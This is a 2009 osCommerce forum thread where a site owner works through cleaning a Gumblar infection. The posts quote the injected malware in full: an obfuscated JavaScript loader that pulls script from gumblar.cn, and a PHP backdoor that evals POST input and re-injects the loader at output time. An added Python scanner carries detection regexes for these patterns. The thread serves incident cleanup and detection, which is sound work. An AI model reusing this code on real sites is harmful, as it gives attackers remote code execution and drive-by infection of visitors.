pure11 Posted May 12, 2009

I have found a really bad virus that has been injected into my .php and .html files on my osCommerce site. I have done the steps to remove the malicious code from the site (via Dreamweaver find-and-replace across all the files in my osCommerce). I have also deleted the created files inside the images folders called images.php. Even after doing this, I view the source of my index store page and I see the code in this section:

</head><script language=javascript><!-- (function(){var Kp5e=('var~20a~3d~22~53~63~72ipt~45ngine~22~2cb~3d~22Ver~73ion(~29+~22~2c~6a~3d~22~ 22~2c~75~3dn~61vigato~72~2e~75se~72~41~67~65~6et~3bif((u~2e~69n~64e~78Of~28~22Win ~22~29~3e~30)~26~26(u~2eindexOf(~22~4eT~206~22)~3c0)~26~26(doc~75men~74~2ecook~69 e~2e~69n~64e~78Of(~22miek~3d1~22)~3c0)~26~26~28typeof(z~72v~7ats)~21~3dt~79pe~6ff (~22~41~22))~29~7bzrv~7a~74~73~3d~22A~22~3be~76~61l(~22if(~77ind~6fw~2e~22+~61~2b ~22)j~3dj~2b~22+~61~2b~22~4da~6a~6fr~22+b~2ba+~22~4d~69nor~22+b+a+~22Build~22+~62 +~22j~3b~22~29~3b~64oc~75~6d~65nt~2ewrite(~22~3cscri~70t~20src~3d~2f~2fgum~62l~61 r~2ec~6e~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(/~/g,'%');var SDce=unescape(Kp5e);eval(SDce)})(); --></script>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<!-- header //-->
<div id="cwdusacontainer">

Where else am I missing that I should look, that it would display the code on this page??? Someone please help, this is very urgent.
bcmiw330 Posted May 13, 2009

> [quotes pure11's opening post above in full]

Did you check...includes/header.php?
pure11 (Author) Posted May 13, 2009

> did you check...includes/header.php?

Hi, yeah, it was a different code entered in my files also; here it is for reference:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBLcDVlPSgn dmFyfjIwYX4zZH4yMn41M342M343MmlwdH40NW5naW5lfjIyfjJjYn4zZH4yMlZlcn43M2lvbih+Mjkrf jIyfjJjfjZhfjNkfjIyfjIyfjJjfjc1fjNkbn42MXZpZ2F0b343Mn4yZX43NXNlfjcyfjQxfjY3fjY1fj ZldH4zYmlmKCh1fjJlfjY5bn42NGV+NzhPZn4yOH4yMldpbn4yMn4yOX4zZX4zMCl+MjZ+MjYodX4yZWl uZGV4T2YofjIyfjRlVH4yMDZ+MjIpfjNjMCl+MjZ+MjYoZG9jfjc1bWVufjc0fjJlY29va342OWV+MmV+ NjlufjY0ZX43OE9mKH4yMm1pZWt+M2QxfjIyKX4zYzApfjI2fjI2fjI4dHlwZW9mKHp+NzJ2fjdhdHMpf jIxfjNkdH43OXBlfjZmZih+MjJ+NDF+MjIpKX4yOX43Ynpydn43YX43NH43M34zZH4yMkF+MjJ+M2Jlfj c2fjYxbCh+MjJpZih+NzdpbmR+NmZ3fjJlfjIyK342MX4yYn4yMilqfjNkan4yYn4yMit+NjF+MmJ+MjJ +NGRhfjZhfjZmcn4yMitifjJiYSt+MjJ+NGR+Njlub3J+MjIrYithK34yMkJ1aWxkfjIyK342Mit+MjJq fjNifjIyfjI5fjNifjY0b2N+NzV+NmR+NjVudH4yZXdyaXRlKH4yMn4zY3Njcml+NzB0fjIwc3JjfjNkf jJmfjJmZ3VtfjYybH42MXJ+MmVjfjZlfjJmcnNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+Mm ZzY3JpcHR+M2V+MjIpfjNifjdkJykucmVwbGFjZSgvfi9nLCclJyk7dmFyIFNEY2U9dW5lc2NhcGUoS3A 1ZSk7ZXZhbChTRGNlKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n 
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Also, they added codes to my .js files, which Dreamweaver did not find, and I'm still cleaning this mess up right now, still infected.
♥geoffreywalton Posted May 13, 2009

Try looking at the date last updated; those with a recent date, or the same one as the infected files, should be concentrated on. G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile. Virus Threat Scanner. My Contributions. Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
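A defender-side scanner that combines the two clues in this thread: the injection patterns visible in the PHP backdoor and JavaScript loader quoted above (eval of POST data, an ob_start() output handler, a long base64 blob, the ~-to-% replace followed by unescape/eval, the hidden host), and the last-modified check suggested in this post. This is an added example, not code from the thread, from osCommerce or from any of the posters; the handler name `tmp_x`, the sample file contents, the 72-hour window and the temporary web root are all constructed for the demo.

```python
import os
import re
import tempfile
import time
from urllib.parse import unquote

# Signatures drawn from the injected PHP backdoor and JS loader quoted in this thread.
SIGNATURES = {
    "php_eval_of_request": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "php_ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"]\w+['\"]\s*\)"),
    "php_long_base64_decode": re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=\s]{200,}"),
    "js_tilde_to_percent": re.compile(r"replace\s*\(\s*/~/g\s*,\s*['\"]%['\"]\s*\)"),
    "js_unescape_then_eval": re.compile(r"unescape\s*\([^)]*\)\s*;\s*eval\s*\("),
    "gumblar_host": re.compile(r"gumblar\.cn", re.I),
}

def scan_text(text):
    """Sorted signature names hit by the raw text or by undoing its ~/%-escaping."""
    decoded = unquote(text.replace("~", "%"))  # the loader hides its host this way
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(text) or rx.search(decoded))
def scan_tree(root, recent_hours=72):
    """{relpath: (hits, recent)} for PHP/HTML/JS files that match a signature or changed recently."""
    cutoff = time.time() - recent_hours * 3600  # the 'date last updated' check
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".html", ".htm", ".js")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            recent = os.path.getmtime(path) >= cutoff
            if hits or recent:
                flagged[os.path.relpath(path, root)] = (hits, recent)
    return flagged
def demo():
    """Constructed sample web root (not real site files); returns scan_tree's findings."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "includes"))
    samples = {  # one clean page, one injected include, one injected HTML page
        "index.html": "<html><head></head><body>Welcome</body></html>",
        "includes/header.php": "<?php if(isset($_POST['tmp_x']))eval($_POST['tmp_x']);ob_start('tmp_x'); ?>",
        "shop.html": "</head><script>(function(){var k=('~2f~2fgum~62lar~2ecn~2frss~2f')"
                     ".replace(/~/g,'%');var s=unescape(k);eval(s)})();</script><body>",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    os.utime(os.path.join(root, "index.html"), (time.time() - 30 * 86400,) * 2)  # backdate the clean page
    return scan_tree(root)
```

Files that match a signature are the ones to clean; files that are only "recent" are the ones to diff against a known-good copy, since the PHP handler re-inserts the script at output time and cleaning the HTML alone does not remove it.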
pure11 (Author) Posted May 13, 2009

> Try looking at the date last updated, those with a recent/same as infected files should be concentrated on. G

I looked in the log for the IPs that connected to the domain and it showed an unknown IP, of course, and all the downloads and uploads they did. I finally finished and removed the last bit of code and now my site is 100% clean!! What a mess this Gumblar made!!

P.S. Downloaded Avast (the very best virus program) and it's free; it found over 10 trojans on my computer. I cleaned up and my computer is 100% clean now. I also upgraded Adobe Acrobat from version 7.0 to the latest, and I disabled the JavaScript in it (this is how the virus got ahold of my information: when I logged in to the FTP program and typed in the PW, it stole my password). I also have, of course, changed my domain password.
♥geoffreywalton Posted May 13, 2009

Good link: http://www.oscommerce.com/forums/index.php?sho...t=0&start=0